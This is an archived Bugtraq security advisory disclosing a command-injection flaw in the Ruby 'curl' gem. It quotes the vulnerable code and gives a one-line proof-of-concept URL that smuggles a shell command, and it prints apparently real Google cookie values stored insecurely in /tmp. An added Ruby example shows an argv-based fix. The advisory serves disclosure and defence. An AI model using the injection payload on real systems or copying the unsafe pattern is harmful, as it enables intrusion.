Bugtraq mailing list archives

Curl Ruby Gem Remote command execution
From: Larry0 () me com
Date: Fri, 15 Mar 2013 14:09:28 GMT

Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb, lines 131-135:

        cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} #{ref}  \"#{url}\"  "
        if @debug
                puts cmd.red
        end
        result = open_pipe(cmd)

PoC
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"";)

larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org

This gem also stores cookie data insecurely in /tmp:
root@underfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@underfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@underfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@underfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com     TRUE    /       FALSE   1426199640      PREF    
ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com   TRUE    /       FALSE   1378938840      NID     
67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com     TRUE    /       FALSE   1426198990      PREF    
ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com   TRUE    /       FALSE   1378938190      NID     
67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@underfl0w:/tmp#
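
A hardened form of the pattern described in this advisory, as an added example that is not part of the original post or the gem's code: the command is built as an argv array and run without a shell, and the cookie jar lives in a private directory. The function names, the sample URL and the echo helper are assumptions made for illustration.

```ruby
require "uri"
require "tmpdir"
require "rbconfig"

# Hardened counterpart of the interpolated `cmd` string: validate the URL,
# then return an argv array so no shell ever parses caller-supplied text.
def build_curl_argv(url, cookie_jar:, user_agent: "example-agent/1.0")
  uri = URI.parse(url) # raises URI::InvalidURIError on quotes, spaces, ...
  unless %w[http https].include?(uri.scheme) && uri.host
    raise ArgumentError, "only absolute http(s) URLs are accepted"
  end
  ["curl", "--cookie-jar", cookie_jar, "--user-agent", user_agent,
   "--url", uri.to_s]
end

# Cookie jar in a fresh per-process directory (0700) and file (0600),
# instead of world-readable files under a shared /tmp/curl.
def private_cookie_jar
  dir = Dir.mktmpdir("curl-") # Dir.mktmpdir creates the directory as 0700
  path = File.join(dir, "cookies.jar")
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600).close
  path
end

# Run an argv array directly (no /bin/sh involved) and return its stdout.
def run_without_shell(argv)
  IO.popen(argv, &:read)
end

# Demo helper (assumption): swap curl for a Ruby one-liner that prints its
# last argument, so the example runs offline yet shows what curl would see.
def last_arg_seen_by_child(argv)
  echo = [RbConfig.ruby, "-e", "print ARGV.last", "--"]
  run_without_shell(echo + argv.drop(1))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input: a syntactically valid URL that still carries shell
  # metacharacters, so URL validation alone would not have been enough.
  url = "http://example.invalid/?q=$(id);x"
  argv = build_curl_argv(url, cookie_jar: private_cookie_jar)
  puts last_arg_seen_by_child(argv) # the URL arrives as one literal argument
end
```

Because the child process receives the URL as a single argv element, `$(...)`, `;` and quotes are never interpreted; in real use `run_without_shell(argv)` would be called with the curl argv unchanged.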

